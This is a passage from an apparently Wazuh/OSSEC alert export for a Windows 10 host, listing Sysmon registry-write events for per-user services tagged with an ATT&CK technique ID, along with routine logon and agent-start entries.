service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.964223800Z"",""eventRecordID"":""644"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.933\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_3f520\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.933"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_3f520\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.933 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_3f520\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:55:18.038",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.962710800Z"",""eventRecordID"":""643"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.918\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.918"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.918 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_3f520\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:55:18.022",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.962366200Z"",""eventRecordID"":""642"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.918\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_3f520\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.918"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_3f520\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.918 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_3f520\Start +Details: DWORD (0x00000002)""" +"Apr 26, 2020 @ 10:55:17.979",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.960769000Z"",""eventRecordID"":""641"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.918\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k ClipboardSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.918"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k ClipboardSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.918 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_3f520\ImagePath +Details: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p""" +"Apr 26, 2020 @ 10:55:17.948",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.960461600Z"",""eventRecordID"":""640"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.918\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_3f520\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.918"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_3f520\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.918 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_3f520\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:55:17.919",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.957704500Z"",""eventRecordID"":""639"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.918\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k LocalService -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.918"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalService -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.918 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_3f520\ImagePath +Details: C:\Windows\system32\svchost.exe -k LocalService -p""" +"Apr 26, 2020 @ 10:55:17.887",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.957311200Z"",""eventRecordID"":""638"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.918\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_3f520\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.918"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_3f520\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.918 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_3f520\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:55:17.858",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.936541700Z"",""eventRecordID"":""637"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.918\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BthAppGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.918"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BthAppGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.918 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_3f520\ImagePath +Details: C:\Windows\system32\svchost.exe -k BthAppGroup -p""" +"Apr 26, 2020 @ 10:55:17.810",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.936330600Z"",""eventRecordID"":""636"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.918\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_3f520\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.918"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_3f520\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.918 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_3f520\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:55:17.704",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.931608700Z"",""eventRecordID"":""634"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.918\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BcastDVRUserService\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.918"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BcastDVRUserService""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.918 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_3f520\ImagePath +Details: C:\Windows\system32\svchost.exe -k BcastDVRUserService""" +"Apr 26, 2020 @ 10:55:17.682",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.929303300Z"",""eventRecordID"":""633"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.918\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_3f520\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.918"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_3f520\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.918 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_3f520\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:55:17.664",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.927519500Z"",""eventRecordID"":""632"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.918\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_3f520\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k AarSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.918"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_3f520\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k AarSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.918 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_3f520\ImagePath +Details: C:\Windows\system32\svchost.exe -k AarSvcGroup -p""" +"Apr 26, 2020 @ 10:55:17.640",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:55:14.927207200Z"",""eventRecordID"":""631"",""processID"":""2196"",""threadID"":""3228"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:55:14.918\r\nProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_3f520\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:55:14.918"",""processGuid"":""{df9fc3d3-6889-5ea5-0000-001041a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_3f520\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:55:14.918 +ProcessGuid: {df9fc3d3-6889-5ea5-0000-001041a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_3f520\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:55:17.496",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 26, 2020 @ 10:55:16.382",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x38254 + Linked Logon ID: 0x3820B + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x160 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:55:16.356",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x3820B + Linked Logon ID: 0x38254 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x160 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:55:14.742",7,"SessionEnv was unavailable to handle a critical notification event",,"""The winlogon notification subscriber was unavailable to handle a critical notification event.""" +"Apr 26, 2020 @ 10:55:13.293",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:55:11.142",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'.", +"Apr 26, 2020 @ 10:54:34.713",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 26, 2020 @ 10:54:34.696",5,"WSearch was unavailable to handle a 